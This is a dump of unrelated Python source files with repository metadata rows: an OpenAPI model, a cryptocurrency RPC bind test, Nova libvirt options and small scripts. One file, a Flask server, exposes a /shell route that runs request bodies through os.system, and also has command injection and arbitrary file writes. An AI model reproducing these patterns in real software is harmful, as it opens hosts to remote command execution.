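# prefix and local folder below are placeholders:
#
#   buckets = list_buckets()
#   keys, dirs = list_objects('my-bucket', prefix='data/')
#   download_dir('my-bucket', 'data/', 'C:\\downloads\\')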
| 33.035714 | 162 | 0.591712 | [
"MIT"
] | vkreat-tech/ctrl4bi | ctrl4bi/aws_connect.py | 2,775 | Python |
n1 = int(input('Digite um valor: '))
n2 = int(input('Digite outro valor: '))
s = n1 + n2
print('A soma entre {} e {} é igual a {}!'.format(n1, n2, s)) | 37.5 | 61 | 0.586667 | [
"MIT"
] | libaniaraujo/Python-Curso-em-Video | exe003.py | 151 | Python |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Submarine Experiment API
The Submarine REST API allows you to create, list, and get experiments. The API is hosted under the /v1/experiment route on the Submarine server. For example, to list experiments on a server hosted at http://localhost:8080, access http://localhost:8080/api/v1/experiment/ # noqa: E501
The version of the OpenAPI document: 0.6.0-SNAPSHOT
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from submarine.experiment.configuration import Configuration
class KernelSpec(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"name": "str", "channels": "list[str]", "dependencies": "list[str]"}
attribute_map = {"name": "name", "channels": "channels", "dependencies": "dependencies"}
def __init__(
self, name=None, channels=None, dependencies=None, local_vars_configuration=None
): # noqa: E501
"""KernelSpec - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._name = None
self._channels = None
self._dependencies = None
self.discriminator = None
if name is not None:
self.name = name
if channels is not None:
self.channels = channels
if dependencies is not None:
self.dependencies = dependencies
@property
def name(self):
"""Gets the name of this KernelSpec. # noqa: E501
:return: The name of this KernelSpec. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this KernelSpec.
:param name: The name of this KernelSpec. # noqa: E501
:type: str
"""
self._name = name
@property
def channels(self):
"""Gets the channels of this KernelSpec. # noqa: E501
:return: The channels of this KernelSpec. # noqa: E501
:rtype: list[str]
"""
return self._channels
@channels.setter
def channels(self, channels):
"""Sets the channels of this KernelSpec.
:param channels: The channels of this KernelSpec. # noqa: E501
:type: list[str]
"""
self._channels = channels
@property
def dependencies(self):
"""Gets the dependencies of this KernelSpec. # noqa: E501
:return: The dependencies of this KernelSpec. # noqa: E501
:rtype: list[str]
"""
return self._dependencies
@dependencies.setter
def dependencies(self, dependencies):
"""Sets the dependencies of this KernelSpec.
:param dependencies: The dependencies of this KernelSpec. # noqa: E501
:type: list[str]
"""
self._dependencies = dependencies
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, KernelSpec):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, KernelSpec):
return True
return self.to_dict() != other.to_dict()
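# A minimal usage sketch (the field values below are made-up examples):
#
#   spec = KernelSpec(name="team_default_python_3",
#                     channels=["defaults"],
#                     dependencies=["python=3.7", "numpy"])
#   payload = spec.to_dict()   # ready to serialize for the REST API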
| 30.718919 | 289 | 0.608657 | [
"Apache-2.0"
] | KUAN-HSUN-LI/submarine | submarine-sdk/pysubmarine/submarine/experiment/models/kernel_spec.py | 5,683 | Python |
# Proton JS - Proton.py
# by Acropolis Point
# module imports
import os
import json
import time
from flask import Flask, jsonify, request, render_template
app = Flask(__name__)
@app.route('/new', methods=['POST'])
# new() function definition
def new():
os.system("python3 window.py " + request.get_data(as_text = True))
return 'OK'
@app.route('/shell', methods=['POST'])
# shell() function definition
def shell():
os.system(request.get_data(as_text = True))
return 'OK'
@app.route('/filesave', methods=['POST'])
def filesave():
theFile = open(request.get_data(as_text = True).split(", ")[1], "w+")
theFile.write(request.get_data(as_text = True).split(", ")[0])
return 'OK'
@app.route('/close', methods=['POST'])
def close():
theFile = open("output.json", "r+")
theFileParsed = json.load(theFile)
theFileParsed['close'] = request.get_data(as_text = True)
theFile.seek(0)
theFile.write(json.dumps(theFileParsed) + " ")
time.sleep(200)
theFile.write("{ \"close\": \"\" }")
return 'OK'
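# Note: this module defines the Flask app but no entry point; how it is started
# is not shown here. One common way to run it locally (an assumption, not taken
# from this project) is:
#
#   if __name__ == '__main__':
#       app.run()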
| 25.119048 | 73 | 0.648341 | [
"MPL-2.0",
"MPL-2.0-no-copyleft-exception"
] | acropolis-point/ProtonJS | server.py | 1,055 | Python |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Californiacoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test running californiacoind with the -rpcbind and -rpcallowip options."""
import socket
import sys
from test_framework.test_framework import CaliforniacoinTestFramework, SkipTest
from test_framework.util import *
from test_framework.netutil import *
class RPCBindTest(CaliforniacoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self):
self.add_nodes(self.num_nodes, None)
def run_bind_test(self, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
self.log.info("Bind test for %s" % str(addresses))
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
self.nodes[0].rpchost = connect_to
self.start_node(0, base_args + binds)
pid = self.nodes[0].process.pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
self.stop_nodes()
def run_allowip_test(self, allow_ips, rpchost, rpcport):
'''
Start a node with rpcallow IP, and request getnetworkinfo
at a non-localhost IP.
'''
self.log.info("Allow IP test for %s:%d" % (rpchost, rpcport))
base_args = ['-disablewallet', '-nolisten'] + ['-rpcallowip='+x for x in allow_ips]
self.nodes[0].rpchost = None
self.start_nodes([base_args])
# connect to node through non-loopback interface
node = get_rpc_proxy(rpc_url(get_datadir_path(self.options.tmpdir, 0), 0, "%s:%d" % (rpchost, rpcport)), 0, coveragedir=self.options.coveragedir)
node.getnetworkinfo()
self.stop_nodes()
def run_test(self):
# due to OS-specific network stats queries, this test works only on Linux
if not sys.platform.startswith('linux'):
raise SkipTest("This test can only be run on linux.")
# find the first non-loopback interface for testing
non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
non_loopback_ip = ip
break
if non_loopback_ip is None:
raise SkipTest("This test requires at least one non-loopback IPv4 interface.")
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("::1",1))
            s.close()
except OSError:
raise SkipTest("This test requires IPv6 support.")
self.log.info("Using interface %s for testing" % non_loopback_ip)
defaultport = rpc_port(0)
# check default without rpcallowip (IPv4 and IPv6 localhost)
self.run_bind_test(None, '127.0.0.1', [],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check default with rpcallowip (IPv6 any)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', [],
[('::0', defaultport)])
# check only IPv4 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', defaultport)])
# check only IPv4 localhost (explicit) with alternative port
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
# check only IPv6 localhost (explicit)
self.run_bind_test(['[::1]'], '[::1]', ['[::1]'],
[('::1', defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check only non-loopback interface
self.run_bind_test([non_loopback_ip], non_loopback_ip, [non_loopback_ip],
[(non_loopback_ip, defaultport)])
# Check that with invalid rpcallowip, we are denied
self.run_allowip_test([non_loopback_ip], non_loopback_ip, defaultport)
assert_raises_rpc_error(-342, "non-JSON HTTP response with '403 Forbidden' from server", self.run_allowip_test, ['1.1.1.1'], non_loopback_ip, defaultport)
if __name__ == '__main__':
RPCBindTest().main()
| 45.422018 | 162 | 0.626742 | [
"MIT"
] | CaliforniaCoinCAC/californiacoin | test/functional/rpcbind_test.py | 4,951 | Python |
# needs:fix_opt_description
# needs:check_deprecation_status
# needs:check_opt_group_and_type
# needs:fix_opt_description_indentation
# needs:fix_opt_registration_consistency
# Copyright 2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from oslo_config import cfg
from nova.conf import paths
# Downtime period in milliseconds
LIVE_MIGRATION_DOWNTIME_MIN = 100
# Step count
LIVE_MIGRATION_DOWNTIME_STEPS_MIN = 3
# Delay in seconds
LIVE_MIGRATION_DOWNTIME_DELAY_MIN = 10
libvirt_group = cfg.OptGroup("libvirt",
title="Libvirt Options",
help="""
Libvirt options allow the cloud administrator to configure the related
libvirt hypervisor driver to be used within an OpenStack deployment.
Almost all of the libvirt config options are influenced by the ``virt_type``
config option, which describes the virtualization type (or so-called domain
type) libvirt should use for specific features such as live migration and
snapshots.
""")
libvirt_general_opts = [
cfg.StrOpt('rescue_image_id',
help="""
The ID of the image to boot from to rescue data from a corrupted instance.
If the rescue REST API operation doesn't provide an ID of an image to
use, the image which is referenced by this ID is used. If this
option is not set, the image from the instance is used.
Possible values:
* An ID of an image or nothing. If it points to an *Amazon Machine
Image* (AMI), consider to set the config options ``rescue_kernel_id``
and ``rescue_ramdisk_id`` too. If nothing is set, the image of the instance
is used.
Related options:
* ``rescue_kernel_id``: If the chosen rescue image allows the separate
definition of its kernel disk, the value of this option is used,
if specified. This is the case when *Amazon*'s AMI/AKI/ARI image
format is used for the rescue image.
* ``rescue_ramdisk_id``: If the chosen rescue image allows the separate
definition of its RAM disk, the value of this option is used if,
specified. This is the case when *Amazon*'s AMI/AKI/ARI image
format is used for the rescue image.
"""),
cfg.StrOpt('rescue_kernel_id',
help="""
The ID of the kernel (AKI) image to use with the rescue image.
If the chosen rescue image allows the separate definition of its kernel
disk, the value of this option is used, if specified. This is the case
when *Amazon*'s AMI/AKI/ARI image format is used for the rescue image.
Possible values:
* An ID of a kernel image or nothing. If nothing is specified, the kernel
disk from the instance is used if it was launched with one.
Related options:
* ``rescue_image_id``: If that option points to an image in *Amazon*'s
AMI/AKI/ARI image format, it's useful to use ``rescue_kernel_id`` too.
"""),
cfg.StrOpt('rescue_ramdisk_id',
help="""
The ID of the RAM disk (ARI) image to use with the rescue image.
If the chosen rescue image allows the separate definition of its RAM
disk, the value of this option is used, if specified. This is the case
when *Amazon*'s AMI/AKI/ARI image format is used for the rescue image.
Possible values:
* An ID of a RAM disk image or nothing. If nothing is specified, the RAM
disk from the instance is used if it was launched with one.
Related options:
* ``rescue_image_id``: If that option points to an image in *Amazon*'s
AMI/AKI/ARI image format, it's useful to use ``rescue_ramdisk_id`` too.
"""),
cfg.StrOpt('virt_type',
default='kvm',
choices=('kvm', 'lxc', 'qemu', 'uml', 'xen', 'parallels'),
help="""
Describes the virtualization type (or so-called domain type) libvirt should
use.
The choice of this type must match the underlying virtualization strategy
you have chosen for this host.
Possible values:
* See the predefined set of case-sensitive values.
Related options:
* ``connection_uri``: depends on this
* ``disk_prefix``: depends on this
* ``cpu_mode``: depends on this
* ``cpu_model``: depends on this
"""),
cfg.StrOpt('connection_uri',
default='',
help="""
Overrides the default libvirt URI of the chosen virtualization type.
If set, Nova will use this URI to connect to libvirt.
Possible values:
* A URI like ``qemu:///system`` or ``xen+ssh://oirase/`` for example.
  This is only necessary if the URI differs from the commonly known URIs
for the chosen virtualization type.
Related options:
* ``virt_type``: Influences what is used as default value here.
"""),
cfg.BoolOpt('inject_password',
default=False,
help="""
Allow the injection of an admin password for an instance, only during the
``create`` and ``rebuild`` process.
There is no agent needed within the image to do this. If *libguestfs* is
available on the host, it will be used. Otherwise *nbd* is used. The file
system of the image will be mounted and the admin password, which is provided
in the REST API call will be injected as password for the root user. If no
root user is available, the instance won't be launched and an error is thrown.
Be aware that the injection is *not* possible when the instance gets launched
from a volume.
Possible values:
* True: Allows the injection.
* False (default): Disallows the injection. Any admin password provided
  via the REST API will be silently ignored.
Related options:
* ``inject_partition``: That option will decide about the discovery and usage
of the file system. It also can disable the injection at all.
"""),
cfg.BoolOpt('inject_key',
default=False,
help="""
Allow the injection of an SSH key at boot time.
There is no agent needed within the image to do this. If *libguestfs* is
available on the host, it will be used. Otherwise *nbd* is used. The file
system of the image will be mounted and the SSH key, which is provided
in the REST API call will be injected as SSH key for the root user and
appended to the ``authorized_keys`` of that user. The SELinux context will
be set if necessary. Be aware that the injection is *not* possible when the
instance gets launched from a volume.
This config option will enable directly modifying the instance disk and does
not affect what cloud-init may do using data from config_drive option or the
metadata service.
Related options:
* ``inject_partition``: That option will decide about the discovery and usage
of the file system. It also can disable the injection at all.
"""),
cfg.IntOpt('inject_partition',
default=-2,
min=-2,
help="""
Determines how the file system is chosen for injecting data into it.
*libguestfs* will be used as a first solution to inject data. If that's not
available on the host, the image will be locally mounted on the host as a
fallback solution. If libguestfs is not able to determine the root partition
(because there are more or fewer than one root partition) or cannot mount the
file system, it will result in an error and the instance won't boot.
Possible values:
* -2 => disable the injection of data.
* -1 => find the root partition with the file system to mount with libguestfs
* 0 => The image is not partitioned
* >0 => The number of the partition to use for the injection
Related options:
* ``inject_key``: If this option allows the injection of a SSH key it depends
on value greater or equal to -1 for ``inject_partition``.
* ``inject_password``: If this option allows the injection of an admin password
it depends on value greater or equal to -1 for ``inject_partition``.
* ``guestfs`` You can enable the debug log level of libguestfs with this
config option. A more verbose output will help in debugging issues.
* ``virt_type``: If you use ``lxc`` as virt_type it will be treated as a
single partition image
"""),
cfg.BoolOpt('use_usb_tablet',
default=True,
deprecated_for_removal=True,
deprecated_reason="This option is being replaced by the "
"'pointer_model' option.",
deprecated_since='14.0.0',
help="""
Enable a mouse cursor within graphical VNC or SPICE sessions.
This will only be taken into account if the VM is fully virtualized and VNC
and/or SPICE is enabled. If the node doesn't support a graphical framebuffer,
then it is valid to set this to False.
Related options:
* ``[vnc]enabled``: If VNC is enabled, ``use_usb_tablet`` will have an effect.
* ``[spice]enabled`` + ``[spice].agent_enabled``: If SPICE is enabled and the
spice agent is disabled, the config value of ``use_usb_tablet`` will have
an effect.
"""),
cfg.StrOpt('live_migration_inbound_addr',
help="""
The IP address or hostname to be used as the target for live migration traffic.
If this option is set to None, the hostname of the migration target compute
node will be used.
This option is useful in environments where the live-migration traffic can
impact the network plane significantly. A separate network for live-migration
traffic can then use this config option and avoids the impact on the
management network.
Possible values:
* A valid IP address or hostname, else None.
"""),
# TODO(hieulq): change to URIOpt for validating schemas with next release
# of oslo_config.
cfg.StrOpt('live_migration_uri',
deprecated_for_removal=True,
deprecated_since="15.0.0",
deprecated_reason="""
live_migration_uri is deprecated for removal in favor of two other options that
allow changing the live migration scheme and target URI: ``live_migration_scheme``
and ``live_migration_inbound_addr`` respectively.
""",
help="""
Live migration target URI to use.
Override the default libvirt live migration target URI (which is dependent
on virt_type). Any included "%s" is replaced with the migration target
hostname.
If this option is set to None (which is the default), Nova will automatically
generate the `live_migration_uri` value based on only 3 supported `virt_type`
in the following list:
* 'kvm': 'qemu+tcp://%s/system'
* 'qemu': 'qemu+tcp://%s/system'
* 'xen': 'xenmigr://%s/system'
Related options:
* ``live_migration_inbound_addr``: If ``live_migration_inbound_addr`` value
is not None, the ip/hostname address of target compute node is used instead
of ``live_migration_uri`` as the uri for live migration.
* ``live_migration_scheme``: If ``live_migration_uri`` is not set, the scheme
used for live migration is taken from ``live_migration_scheme`` instead.
"""),
cfg.StrOpt('live_migration_scheme',
help="""
Scheme used for live migration.
Override the default libvirt live migration scheme (which is dependent on
virt_type). If this option is set to None, nova will automatically choose a
sensible default based on the hypervisor. It is not recommended that you change
this unless you are very sure that the hypervisor supports a particular scheme.
Related options:
* ``virt_type``: This option is meaningful only when ``virt_type`` is set to
`kvm` or `qemu`.
* ``live_migration_uri``: If ``live_migration_uri`` value is not None, the
scheme used for live migration is taken from ``live_migration_uri`` instead.
"""),
cfg.BoolOpt('live_migration_tunnelled',
default=False,
help="""
Enable tunnelled migration.
This option enables the tunnelled migration feature, where migration data is
transported over the libvirtd connection. If enabled, we use the
VIR_MIGRATE_TUNNELLED migration flag, avoiding the need to configure
the network to allow direct hypervisor to hypervisor communication.
If False, use the native transport. If not set, Nova will choose a
sensible default based on, for example, the availability of native
encryption support in the hypervisor. Enabling this option will definitely
impact performance massively.
Note that this option is NOT compatible with use of block migration.
Possible values:
* Supersedes and (if set) overrides the deprecated 'live_migration_flag' and
'block_migration_flag' to enable tunneled migration.
"""),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help="""
Maximum bandwidth(in MiB/s) to be used during migration.
If set to 0, the hypervisor will choose a suitable default. Some hypervisors
do not support this feature and will return an error if bandwidth is not 0.
Please refer to the libvirt documentation for further details.
"""),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_MIN constant.
cfg.IntOpt('live_migration_downtime',
default=500,
help="""
Maximum permitted downtime, in milliseconds, for live migration
switchover.
Will be rounded up to a minimum of %dms. You can increase this value
if you want to allow live-migrations to complete faster, or avoid
live-migration timeout errors by allowing the guest to be paused for
longer during the live-migration switch over.
Related options:
* live_migration_completion_timeout
""" % LIVE_MIGRATION_DOWNTIME_MIN),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_STEPS_MIN constant.
cfg.IntOpt('live_migration_downtime_steps',
default=10,
help="""
Number of incremental steps to reach max downtime value.
Will be rounded up to a minimum of %d steps.
""" % LIVE_MIGRATION_DOWNTIME_STEPS_MIN),
# TODO(hieulq): Need to add min argument by moving from
# LIVE_MIGRATION_DOWNTIME_DELAY_MIN constant.
cfg.IntOpt('live_migration_downtime_delay',
default=75,
help="""
Time to wait, in seconds, between each step increase of the migration
downtime.
Minimum delay is %d seconds. Value is per GiB of guest RAM + disk to be
transferred, with lower bound of a minimum of 2 GiB per device.
""" % LIVE_MIGRATION_DOWNTIME_DELAY_MIN),
cfg.IntOpt('live_migration_completion_timeout',
default=800,
mutable=True,
help="""
Time to wait, in seconds, for migration to successfully complete transferring
data before aborting the operation.
Value is per GiB of guest RAM + disk to be transferred, with lower bound of
a minimum of 2 GiB. Should usually be larger than downtime delay * downtime
steps. Set to 0 to disable timeouts.
Related options:
* live_migration_downtime
* live_migration_downtime_steps
* live_migration_downtime_delay
"""),
cfg.IntOpt('live_migration_progress_timeout',
default=0,
deprecated_for_removal=True,
deprecated_reason="Serious bugs found in this feature.",
mutable=True,
help="""
Time to wait, in seconds, for migration to make forward progress in
transferring data before aborting the operation.
Set to 0 to disable timeouts.
This is deprecated, and now disabled by default because we have found serious
bugs in this feature that caused false live-migration timeout failures. This
feature will be removed or replaced in a future release.
"""),
cfg.BoolOpt('live_migration_permit_post_copy',
default=False,
help="""
This option allows nova to switch an on-going live migration to post-copy
mode, i.e., switch the active VM to the one on the destination node before the
migration is complete, therefore ensuring an upper bound on the memory that
needs to be transferred. Post-copy requires libvirt>=1.3.3 and QEMU>=2.5.0.
When permitted, post-copy mode will be automatically activated if a
live-migration memory copy iteration does not make a percentage increase of at
least 10% over the last iteration.
The live-migration force complete API also uses post-copy when permitted. If
post-copy mode is not available, force complete falls back to pausing the VM
to ensure the live-migration operation will complete.
When using post-copy mode, if the source and destination hosts lose network
connectivity, the VM being live-migrated will need to be rebooted. For more
details, please see the Administration guide.
Related options:
* live_migration_permit_auto_converge
"""),
cfg.BoolOpt('live_migration_permit_auto_converge',
default=False,
help="""
This option allows nova to start live migration with auto converge on.
Auto converge throttles down CPU if the progress of an on-going live migration
is slow. Auto converge will only be used if this flag is set to True and
post copy is not permitted or post copy is unavailable due to the version
of libvirt and QEMU in use. Auto converge requires libvirt>=1.2.3 and
QEMU>=1.6.0.
Related options:
* live_migration_permit_post_copy
"""),
cfg.StrOpt('snapshot_image_format',
choices=('raw', 'qcow2', 'vmdk', 'vdi'),
help="""
Determine the snapshot image format when sending to the image service.
If set, this decides what format is used when sending the snapshot to the
image service.
If not set, defaults to same type as source image.
Possible values:
* ``raw``: RAW disk format
* ``qcow2``: KVM default disk format
* ``vmdk``: VMWare default disk format
* ``vdi``: VirtualBox default disk format
* If not set, defaults to same type as source image.
"""),
cfg.StrOpt('disk_prefix',
help="""
Override the default disk prefix for the devices attached to an instance.
If set, this is used to identify a free disk device name for a bus.
Possible values:
* Any prefix which will result in a valid disk device name like 'sda' or 'hda'
  for example. This is only necessary if the device names differ from the
commonly known device name prefixes for a virtualization type such as: sd,
xvd, uvd, vd.
Related options:
* ``virt_type``: Influences which device type is used, which determines
the default disk prefix.
"""),
cfg.IntOpt('wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
                    ' if instance does not shut down within this window.'),
cfg.StrOpt('cpu_mode',
choices=('host-model', 'host-passthrough', 'custom', 'none'),
help="""
Is used to set the CPU mode an instance should have.
If virt_type="kvm|qemu", it will default to "host-model", otherwise it will
default to "none".
Possible values:
* ``host-model``: Clones the host CPU feature flags.
* ``host-passthrough``: Use the host CPU model exactly;
* ``custom``: Use a named CPU model;
* ``none``: Not set any CPU model.
Related options:
* ``cpu_model``: If ``custom`` is used for ``cpu_mode``, set this config
option too, otherwise this would result in an error and the instance won't
be launched.
"""),
cfg.StrOpt('cpu_model',
help="""
Set the name of the libvirt CPU model the instance should use.
Possible values:
* The names listed in /usr/share/libvirt/cpu_map.xml
Related options:
* ``cpu_mode``: Don't set this when ``cpu_mode`` is NOT set to ``custom``.
This would result in an error and the instance won't be launched.
* ``virt_type``: Only the virtualization types ``kvm`` and ``qemu`` use this.
"""),
cfg.StrOpt('snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: file=directsync,block=none'),
cfg.StrOpt('rng_dev_path',
help='A path to a device that will be used as source of '
'entropy on the host. Permitted options are: '
'/dev/random or /dev/hwrng'),
cfg.ListOpt('hw_machine_type',
help='For qemu or KVM guests, set this option to specify '
'a default machine type per host architecture. '
'You can find a list of supported machine types '
'in your environment by checking the output of '
'the "virsh capabilities"command. The format of the '
'value for this config option is host-arch=machine-type. '
'For example: x86_64=machinetype1,armv7l=machinetype2'),
cfg.StrOpt('sysinfo_serial',
default='auto',
choices=('none', 'os', 'hardware', 'auto'),
               help='The data source used to populate the host "serial" '
'UUID exposed to guest in the virtual BIOS.'),
cfg.IntOpt('mem_stats_period_seconds',
default=10,
               help='Period in seconds for reporting memory usage statistics. '
                    'A zero or negative value disables memory usage '
                    'statistics.'),
cfg.ListOpt('uid_maps',
default=[],
                help='List of uid targets and ranges. '
                     'Syntax is guest-uid:host-uid:count. '
                     'Maximum of 5 allowed.'),
cfg.ListOpt('gid_maps',
default=[],
                help='List of gid targets and ranges. '
                     'Syntax is guest-gid:host-gid:count. '
                     'Maximum of 5 allowed.'),
cfg.IntOpt('realtime_scheduler_priority',
default=1,
               help='In a realtime host context, vCPUs for the guest will run '
                    'at that scheduling priority. The priority depends on the '
                    'host kernel (usually 1-99).'),
cfg.ListOpt('enabled_perf_events',
default=[],
help= """
This is a performance event list which could be used as monitor. These events
will be passed to libvirt domain xml while creating a new instances.
Then event statistics data can be collected from libvirt. The minimum
libvirt version is 2.0.0. For more information about `Performance monitoring
events`, refer https://libvirt.org/formatdomain.html#elementsPerf .
Possible values:
* A string list. For example: ``enabled_perf_events = cmt, mbml, mbmt``
The supported events list can be found in
https://libvirt.org/html/libvirt-libvirt-domain.html ,
which you may need to search key words ``VIR_PERF_PARAM_*``
"""),
]
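# Hedged illustration (not part of the original module): a minimal nova.conf
# fragment showing how the live-migration knobs defined above are typically
# combined so that post-copy is preferred and auto-converge only kicks in
# when post-copy is unavailable. The values are examples, not recommendations.
#
#     [libvirt]
#     live_migration_permit_post_copy = True
#     live_migration_permit_auto_converge = True
#     live_migration_downtime = 500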
libvirt_imagebackend_opts = [
cfg.StrOpt('images_type',
default='default',
choices=('raw', 'flat', 'qcow2', 'lvm', 'rbd', 'ploop',
'default'),
help="""
VM Images format.
If default is specified, then use_cow_images flag is used instead of this
one.
Related options:
* virt.use_cow_images
* images_volume_group
"""),
cfg.StrOpt('images_volume_group',
help="""
LVM Volume Group that is used for VM images, when you specify images_type=lvm
Related options:
* images_type
"""),
cfg.BoolOpt('sparse_logical_volumes',
default=False,
help="""
Create sparse logical volumes (with virtualsize) if this flag is set to True.
"""),
cfg.StrOpt('images_rbd_pool',
default='rbd',
help='The RADOS pool in which rbd volumes are stored'),
cfg.StrOpt('images_rbd_ceph_conf',
default='', # default determined by librados
help='Path to the ceph configuration file to use'),
cfg.StrOpt('hw_disk_discard',
choices=('ignore', 'unmap'),
help="""
Discard option for nova managed disks.
Requires:
* Libvirt >= 1.0.6
* Qemu >= 1.5 (raw format)
* Qemu >= 1.6 (qcow2 format)
"""),
]
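# Hedged illustration (not part of the original module): a sample nova.conf
# fragment for a Ceph/RBD-backed image backend using the options above; the
# pool name and configuration path are placeholders for a real deployment.
#
#     [libvirt]
#     images_type = rbd
#     images_rbd_pool = vms
#     images_rbd_ceph_conf = /etc/ceph/ceph.conf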
libvirt_imagecache_opts = [
cfg.StrOpt('image_info_filename_pattern',
default='$instances_path/$image_cache_subdirectory_name/'
'%(image)s.info',
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='Image info files are no longer used by the '
'image cache',
help='Allows image information files to be stored in '
'non-standard locations'),
cfg.IntOpt('remove_unused_resized_minimum_age_seconds',
default=3600,
help='Unused resized base images younger than this will not be '
'removed'),
cfg.BoolOpt('checksum_base_images',
default=False,
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='The image cache no longer periodically '
'calculates checksums of stored images. '
'Data integrity can be checked at the block '
'or filesystem level.',
help='Write a checksum for files in _base to disk'),
cfg.IntOpt('checksum_interval_seconds',
default=3600,
deprecated_for_removal=True,
deprecated_since='14.0.0',
deprecated_reason='The image cache no longer periodically '
'calculates checksums of stored images. '
'Data integrity can be checked at the block '
'or filesystem level.',
help='How frequently to checksum base images'),
]
libvirt_lvm_opts = [
cfg.StrOpt('volume_clear',
default='zero',
choices=('none', 'zero', 'shred'),
help="""
Method used to wipe ephemeral disks when they are deleted. Only takes effect
if LVM is set as backing storage.
Possible values:
* none - do not wipe deleted volumes
* zero - overwrite volumes with zeroes
* shred - overwrite volume repeatedly
Related options:
* images_type - must be set to ``lvm``
* volume_clear_size
"""),
cfg.IntOpt('volume_clear_size',
default=0,
min=0,
help="""
Size of area in MiB, counting from the beginning of the allocated volume,
that will be cleared using method set in ``volume_clear`` option.
Possible values:
* 0 - clear whole volume
* >0 - clear specified amount of MiB
Related options:
* images_type - must be set to ``lvm``
* volume_clear - must be set and the value must be different than ``none``
for this option to have any impact
"""),
]
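# Hedged illustration (not part of the original module): the two options above
# only take effect when LVM backs the instance disks, e.g. with a nova.conf
# similar to the sketch below (the volume group name is a placeholder).
#
#     [libvirt]
#     images_type = lvm
#     images_volume_group = nova-volumes
#     volume_clear = shred
#     volume_clear_size = 1024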
libvirt_utils_opts = [
cfg.BoolOpt('snapshot_compression',
default=False,
help="""
Enable snapshot compression for ``qcow2`` images.
Note: you can set ``snapshot_image_format`` to ``qcow2`` to force all
snapshots to be in ``qcow2`` format, independently from their original image
type.
Related options:
* snapshot_image_format
"""),
]
libvirt_vif_opts = [
cfg.BoolOpt('use_virtio_for_bridges',
default=True,
help='Use virtio for bridge interfaces with KVM/QEMU'),
]
